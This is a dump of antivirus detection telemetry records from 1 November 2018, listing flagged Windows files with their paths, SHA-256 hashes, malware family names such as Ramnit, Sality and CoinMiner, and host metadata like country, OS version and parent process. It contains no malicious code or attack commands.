  Row(detection=Row(filename='avscan-20181101-113559-7b0c2381', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d8173745\\AVSCAN-20181101-111512-6E8DC715\\AVSCAN-20181101-113559-7B0C2381', filesize=1952000, name='Adware/Widgi.vqxpa.#M1.#R1'), hash='592b7d066b4a229f997bf6ab2da7137333d44655d716c292bf8a9dfc2f474e57', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:35:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T21:23:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-000054-0515e9a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c6b869d0\\AVSCAN-20181101-235218-991817B7\\AVSCAN-20181102-000054-0515E9A6', filesize=14208000, name='TR/CoinMiner.593149.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T22:00:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141157-77454f20', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a72d9d30\\AVSCAN-20181101-141146-750DFD81\\AVSCAN-20181101-141157-77454F20', filesize=14208000, name='TR/CoinMiner.593149.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T12:11:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='\\\\?\\C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='PT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:25:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T12:11:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091048-7b578da9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2c0bde03\\AVSCAN-20181101-090119-0AF3D2E8\\AVSCAN-20181101-091048-7B578DA9', filesize=14208000, name='TR/CoinMiner.593149.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='AE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:10:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='\\\\?\\C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T09:32:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T21:23:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline='rtp', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1903728, timestamp='2018-11-01T21:23:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T21:23:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmpnssci.dll', filepath='C:\\Program Files\\Windows Media Player\\wmpnssci.dll', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='59321160cdcfaed3e4c40c3e3b350d3f0d0fea2500d6f7053c432ba2adabf7d3', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:58:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b8.estimate.patch.exe', filepath='c:\\program files\\bazissoft\\bazis 8\\b8.estimate.patch.exe', filesize=64000, name='SPR/Tool.Keygen.8710.#M1.#R1'), hash='59a14c8f321bd15f3ac30fd45c5aee26e3bbdf59512195a36e679605476fcd04', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T23:10:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='59ab2184f2377018262473ace1914b28815980e336dbfdf2bf94c4ea79380e82', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\59AB2184F2377018262473ACE1914B28815980E336DBFDF2BF94C4EA79380E82', filesize=148000, name='TR/Crypt.ZPACK.Gen7.#M300.#R600521'), hash='59ab2184f2377018262473ace1914b28815980e336dbfdf2bf94c4ea79380e82', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:15:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='deldrv.exe', filepath='E:\\Daiver Printer\\Canon MX328\\win\\XPS\\x86\\DrvSetup\\DelDrv.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='5a0ca1f2a1226da6571a0466d7f0e0c35957f38aba1e52ee029fb018da5b2fbd', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T11:18:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='deldrv.exe', filepath='\\\\?\\E:\\Daiver Printer\\Canon MX328\\win\\XPS\\x86\\DrvSetup\\DelDrv.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='5a0ca1f2a1226da6571a0466d7f0e0c35957f38aba1e52ee029fb018da5b2fbd', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:37:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='F:\\研究生简历\\商家爱玩\\新建文件夹\\尚素英\\新建文件夹\\软件\\2007CAD安装盘\\acadFeui\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA6\\VBE6.DLL', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='5a381dfef5929cbc85b788eab3459e90275f329339c74cfdf90bb3ba98832faa', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-01T12:51:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='F:\\研究生简历\\商家爱玩\\新建文件夹\\尚素英\\新建文件夹\\软件\\2007CAD安装盘\\acadFeui\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA6\\VBE6.DLL', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='5a381dfef5929cbc85b788eab3459e90275f329339c74cfdf90bb3ba98832faa', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-01T22:58:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbe6.dll', filepath='F:\\研究生简历\\商家爱玩\\新建文件夹\\尚素英\\新建文件夹\\软件\\CAD2008能用\\AutoCAD 2008安装包\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.CD.#M1.#R1'), hash='5a381dfef5929cbc85b788eab3459e90275f329339c74cfdf90bb3ba98832faa', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-01T13:13:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flash_tool.exe', filepath='D:\\china\\SP_Flash_Tool_v5.1504_Win\\SP_Flash_Tool_5.1504\\flash_tool.exe', filesize=8320000, name='W32/Sality.AT.#M1.#R1'), hash='5a412a2588a0d51ce109aef669889763ab73e6f644595486c2c613f7bddbd0c1', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\china\\HUAWEI_Y336-U02_Firmware_V100R001C328B109_05021UAY_Sri Lanka\\Software\\Y336-U02V100R001C328B109\\Software\\Upgtade tools&drivers\\ResearchDownload_2.9.9016\\Bin\\ResearchDownload.exe', parentsize=1687552, timestamp='2018-11-01T14:46:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='igfxcfg.exe', filepath='I:\\Driver\\899_drivers\\Intel\\I945GM\\Vga\\Windrv\\win2000\\igfxcfg.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='5a61e2397de06f5d9a9f5d0488dddc88208bdef09664728bc8762214213e1d08', metadata=Row(cmdline=None, country='A1', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-01T12:07:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='agm.dll', filepath='C:\\Program Files\\Adobe\\Reader 9.0\\Reader\\AGM.dll', filesize=5760000, name='W32/Ramnit.CD.#M1.#R1'), hash='5a9fc80398b032446de9efa88eb748c3278349610abd9164ecc13d5bf9ba42d6', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:24:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sndvol.exe', filepath='C:\\Windows.old.000\\Windows\\System32\\SndVol.exe', filesize=384000, name='W32/Sality.AT.#M1.#R1'), hash='5ac9bd9a43c94c4a91e800d0d758adb91d82f820c031f6e980f081be0f7ce0fc', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T02:46:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='5bdbede0a0bbc7d09dd0d228d82b3148fe9c74128c678e5379280c842c2d9280', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.categorizing\\5BDBEDE0A0BBC7D09DD0D228D82B3148FE9C74128C678E5379280C842C2D9280', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='5bdbede0a0bbc7d09dd0d228d82b3148fe9c74128c678e5379280c842c2d9280', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T10:11:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='89b490ad7574511ddc2962f56c95b893.smp', filepath='\\\\192.168.10.10\\SHARED\\_tools\\runtime\\scan\\tmp_1071369123\\89b490ad7574511ddc2962f56c95b893.smp', filesize=1000000, name='TR/Dropper.Gen.#M300.#R3322'), hash='5c108c7200ec6307dce63d56274d5a7035adbbd7dcef33827e7c9cc71d7a26c9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\tools\\http_server\\http_server.exe', parentsize=6242816, timestamp='2018-11-01T19:26:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mstjy.exe', filepath='C:\\ProgramData\\mstjy.exe', filesize=70112000, name='WORM/Lodbak.Gen.#M2.#R7829'), hash='5c54ab809c85d95bace97bc56b16f59c2e0aa0b14db212e7a264d6299aeb0149', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:28:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mstjy.exe', filepath='C:\\ProgramData\\mstjy.exe', filesize=70112000, name='WORM/Lodbak.Gen.#M2.#R7829'), hash='5c54ab809c85d95bace97bc56b16f59c2e0aa0b14db212e7a264d6299aeb0149', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:27:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\Desktop\\datos\\Documents and Settings\\pc\\Escritorio\\back up\\Adobe Illustrator Installer\\Illustrator 10\\Installer\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='5caba6ff2320ec54114ddb1c4a726fcf8e303f25a2bd9970cd32e276fa95ed36', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:WbzpCeV2OU6WROfV.1', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-01T13:24:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbscript.exe', filepath='c:\\program files (x86)\\otter32\\vbscript.exe', filesize=896000, name='HEUR/APC.#M1.#R1'), hash='5cae4d902e2d11f0980df6844ecb2606dd2fb0916bd5f744bddd933201d262de', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\msiexec.exe', parentsize=73216, timestamp='2018-11-01T17:44:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-104557-a62af02b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a1bd6140\\AVSCAN-20181101-104511-9D396937\\AVSCAN-20181101-104557-A62AF02B', filesize=896000, name='HEUR/APC.#M1.#R1'), hash='5cae4d902e2d11f0980df6844ecb2606dd2fb0916bd5f744bddd933201d262de', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:46:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vbscript.exe', filepath='c:\\program files (x86)\\otter32\\vbscript.exe', filesize=896000, name='HEUR/APC.#M1.#R1'), hash='5cae4d902e2d11f0980df6844ecb2606dd2fb0916bd5f744bddd933201d262de', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\msiexec.exe', parentsize=60416, timestamp='2018-11-01T18:53:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='installs.exe', filepath='C:\\Program Files (x86)\\SolidWorks Corp\\COSMOS M\\License\\Flexlm\\installs.exe', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='5cd77127651103b0252b02ac59c6d594711b4f1e1c386aa716cf3eb325a67005', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:LR+zorPAlEGtGn9J.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T01:37:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='acu4.exe', filepath='\\\\?\\C:\\NAPRO\\PC-SCAN3000 USB\\AIRBAG\\ACU4.exe', filesize=2496000, name='HEUR/APC.#M1.#R1'), hash='5d0057bb9bb9a05157cb1e2715a23c0699dcb453c6154dafe485afe01c5b3280', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:43:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='174.dll', filepath='\\\\?\\C:\\Program Files\\-ViewPassword-soft\\174.dll', filesize=192000, name='Adware/AddLyrics.192000.17.#M1.#R1'), hash='5d27ba6e0d8d2947ab021d5a26028aab3ed8a01b28028572702e42c0ab928bd3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:32:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='174.dll', filepath='\\\\?\\C:\\Program Files\\-ViewPassword-soft\\174.dll', filesize=192000, name='Adware/AddLyrics.192000.17.#M1.#R1'), hash='5d27ba6e0d8d2947ab021d5a26028aab3ed8a01b28028572702e42c0ab928bd3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:18:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered docif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered docif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='5d3e1662e81cf3058a2979d5ca569df72fda4aa3b500d2b6d3f3aea6fda7f20a', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:56:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered docif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered docif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='5d3e1662e81cf3058a2979d5ca569df72fda4aa3b500d2b6d3f3aea6fda7f20a', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:52:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered docif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered docif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='5d3e1662e81cf3058a2979d5ca569df72fda4aa3b500d2b6d3f3aea6fda7f20a', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:50:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='advertisement.pif', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 8.3.2\\Advertisement\\Advertisement.pif', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='recorded tv.exe', filepath='C:\\Users\\X\\Recorded TV\\Recorded TV.exe', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8.3.2.pif', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 8.3.2\\8.3.2.pif', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='favorites.bat', filepath='C:\\Users\\X\\Favorites\\Favorites.bat', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tools images.scr', filepath='C:\\Users\\X\\Documents\\Daemon Tools Images\\Tools Images.scr', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='non-cpdf.bat', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 8.3.2\\Start\\en-US\\tpl\\non-cpdf\\non-cpdf.bat', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='libraries.pif', filepath='C:\\Users\\X\\Libraries\\Libraries.pif', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='videos.pif', filepath='C:\\Users\\X\\Videos\\Videos.pif', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='music.scr', filepath='C:\\Users\\X\\Music\\Music.scr', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ad.scr', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 7.3.4\\advertisement\\ad\\ad.scr', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='public.exe', filepath='C:\\Users\\X\\Public.exe', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='software.exe', filepath='C:\\Users\\X\\Foxit Software\\Software.exe', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='default.exe', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 7.3.4\\start\\en-US\\Default\\Default.exe', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='media.bat', filepath='C:\\Users\\X\\Recorded TV\\Sample Media\\Media.bat', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpl.exe', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 7.3.4\\start\\en-US\\tpl\\tpl.exe', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='start.pif', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\StartPage 8.3.2\\Start\\Start.pif', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='connectedpdf.bat', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\ConnectedPDF\\ConnectedPDF.bat', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:28Z'), dt=datetime.date(2018, 11, 1)),
